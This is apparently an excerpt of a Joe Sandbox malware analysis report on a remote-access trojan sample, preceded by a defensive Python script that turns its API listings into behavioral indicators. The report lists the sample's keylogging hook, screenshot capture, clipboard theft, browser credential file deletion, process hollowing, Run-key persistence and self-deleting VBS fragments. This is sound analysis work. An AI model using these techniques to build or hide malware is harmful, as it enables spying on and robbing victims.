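The function blocks above list the raw API calls behind several of the signatures in this report: SetWindowsHookExA with idHook 0000000D (WH_KEYBOARD_LL in the Windows SDK) plus a GetMessage/TranslateMessage/DispatchMessage pump for the keylogger, ToUnicodeEx for keystroke translation, InternetOpenUrlW against http://geoplugin.net/json.gp, DeleteFileA on the Chrome "Login Data" file, LookupPrivilegeValueA for SeShutdownPrivilege ahead of ExitWindowsEx, and FindResourceA for a resource named SETTINGS of type 0000000A (RT_RCDATA). The following script is an added example, not part of the Joe Sandbox report and not code from the sample: it parses lines in the plugin's "APIs" listing format (arguments shown as bare hex, "?" for values the plugin could not resolve, nested "Part of subcall function" entries) and turns them into behavioral indicators keyed on API name plus decoded argument, rather than on API name alone, because FindFirstFileW, DeleteFileA or Sleep on their own say nothing. The sample input is constructed from lines copied off this page; the indicator names and thresholds are the author's own choices.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows SDK constants used to decode the raw hex arguments in the listing.
WH_KEYBOARD_LL = 13   # SetWindowsHookEx idHook: low-level keyboard hook
RT_RCDATA = 10        # FindResource lpType: raw RCDATA resource

# Constructed sample input: API lines copied from the function blocks on this
# page, in the Joe Sandbox IDA plugin "APIs" format.
SAMPLE_LISTING = r"""
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• GetLastError.KERNEL32 ref: 0040A328
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
• ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
• Sleep.KERNEL32(00000BB8), ref: 0040F896
"""

# One listing line: optional subcall prefix, Api.MODULE, optional (args), ref: addr
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                        # call-site address from the listing
    callee: Optional[str] = None    # set for "Part of subcall function" lines

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an int if the listing shows it as hex, else None ('?' or a string)."""
        if i >= len(self.args):
            return None
        try:
            return int(self.args[i], 16)
        except ValueError:
            return None

    def arg_has(self, needle: str) -> bool:
        """Case-insensitive substring match over all string arguments."""
        return any(needle.lower() in a.lower() for a in self.args)


def parse_listing(text: str) -> List[ApiCall]:
    """Parse every recognisable API line; lines in any other format are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref"), m.group("callee")))
    return calls


# Indicator name -> predicate over one call. Each keys on API plus argument.
INDICATORS = [
    ("keyboard_hook",
     lambda c: c.api.startswith("SetWindowsHookEx") and c.arg_int(0) == WH_KEYBOARD_LL),
    ("keystroke_translation", lambda c: c.api == "ToUnicodeEx"),
    ("geolocation_lookup",
     lambda c: c.api.startswith("InternetOpenUrl") and c.arg_has("geoplugin.net")),
    ("browser_credential_wipe",
     lambda c: c.api.startswith("DeleteFile") and c.arg_has("Login Data")),
    ("shutdown_privilege",
     lambda c: c.api.startswith("LookupPrivilegeValue") and c.arg_has("SeShutdownPrivilege")),
    ("forced_shutdown_or_logoff", lambda c: c.api == "ExitWindowsEx"),
    ("embedded_config_resource",
     lambda c: c.api.startswith("FindResource") and c.arg_has("SETTINGS")
     and c.arg_int(1) == RT_RCDATA),
    ("download_to_file", lambda c: c.api.startswith("URLDownloadToFile")),
    # Sleep >= 1 s before continuing; 00000BB8 on this page is 3000 ms.
    ("execution_delay", lambda c: c.api == "Sleep" and (c.arg_int(0) or 0) >= 1000),
]


def triage(text: str) -> dict:
    """Map each indicator that fired to the call-site addresses where it fired."""
    hits = {}
    for call in parse_listing(text):
        for name, pred in INDICATORS:
            if pred(call):
                hits.setdefault(name, []).append(call.ref)
    return hits


if __name__ == "__main__":
    for name, refs in triage(SAMPLE_LISTING).items():
        print(f"{name:28s} at {', '.join(refs)}")
```

Subcall lines are kept as separate calls with their callee address recorded, so a privilege lookup that only appears inside a helper (0041798D here) still surfaces at its own ref. Unresolvable arguments ("?") decode to None, so a rule that needs a specific constant, such as the WH_KEYBOARD_LL check, will not fire on a call whose idHook the plugin could not recover; that is the intended conservative behaviour.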
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004096A5
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNext
                                    • String ID:
                                    • API String ID: 1157919129-0
                                    • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                    • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                    • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                    • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0040884C
                                    • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                    • String ID:
                                    • API String ID: 1771804793-0
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                    • API ID: DownloadExecuteFileShell
                                    • String ID: C:\Users\user\AppData\Roaming\keHuNxIumw.exe$open
                                    • API String ID: 2825088817-80687600
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • API ID: FileFind$FirstNextsend
                                    • String ID: XPG$XPG
                                    • API String ID: 4113138495-1962359302
                                    APIs
                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                      • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                      • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                      • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                    • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                    • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                    • String ID:
                                    • API String ID: 4212172061-0
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID: p'E$JD
                                    • API String ID: 1084509184-908320845
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                    • String ID:
                                    • API String ID: 2829624132-0
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                    • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 0040B74C
                                    • GetClipboardData.USER32(0000000D), ref: 0040B758
                                    • CloseClipboard.USER32 ref: 0040B760
                                    • API ID: Clipboard$CloseDataOpen
                                    • String ID:
                                    • API String ID: 2058664381-0
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-3916222277
                                    • API ID:
                                    • String ID: .
                                    • API String ID: 0-248832578
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID: JD
                                    • API String ID: 1084509184-2669065882
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                    • API ID: InfoLocale
                                    • String ID: GetLocaleInfoEx
                                    • API String ID: 2299586839-2904428671
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                    • String ID:
                                    • API String ID: 1663032902-0
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                    • API ID: ErrorLast$InfoLocale_abort_free
                                    • String ID:
                                    • API String ID: 2692324296-0
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    APIs
                                      • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                    • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                    • String ID:
                                    • API String ID: 1272433827-0
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                    • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                    • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                    • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                    • Instruction Fuzzy Hash:
                                    APIs
                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                      • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                    • DeleteDC.GDI32(00000000), ref: 00418F65
                                    • DeleteDC.GDI32(00000000), ref: 00418F68
                                    • DeleteObject.GDI32(00000000), ref: 00418F6B
                                    • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                    • DeleteDC.GDI32(00000000), ref: 00418F9D
                                    • DeleteDC.GDI32(00000000), ref: 00418FA0
                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                    • GetIconInfo.USER32(?,?), ref: 00418FF8
                                    • DeleteObject.GDI32(?), ref: 00419027
                                    • DeleteObject.GDI32(?), ref: 00419034
                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                    • DeleteDC.GDI32(?), ref: 004191B7
                                    • DeleteDC.GDI32(00000000), ref: 004191BA
                                    • DeleteObject.GDI32(00000000), ref: 004191BD
                                    • GlobalFree.KERNEL32(?), ref: 004191C8
                                    • DeleteObject.GDI32(00000000), ref: 0041927C
                                    • GlobalFree.KERNEL32(?), ref: 00419283
                                    • DeleteDC.GDI32(?), ref: 00419293
                                    • DeleteDC.GDI32(00000000), ref: 0041929E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                    • String ID: DISPLAY
                                    • API String ID: 479521175-865373369
                                    • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                    • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                    • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                    • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                    • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                    • ResumeThread.KERNEL32(?), ref: 00418470
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                    • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                    • GetLastError.KERNEL32 ref: 004184B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                    • API String ID: 4188446516-3035715614
                                    • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                    • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                    • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                    • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                    APIs
                                      • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                      • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                      • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                      • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                      • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                      • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                    • ExitProcess.KERNEL32 ref: 0040D80B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-1447701601
                                    • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                    • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                    • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                    • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                    APIs
                                      • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                      • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                      • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                      • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                      • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                      • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                    • ExitProcess.KERNEL32 ref: 0040D454
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                    • API String ID: 3797177996-2483056239
                                    • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                    • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                    • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
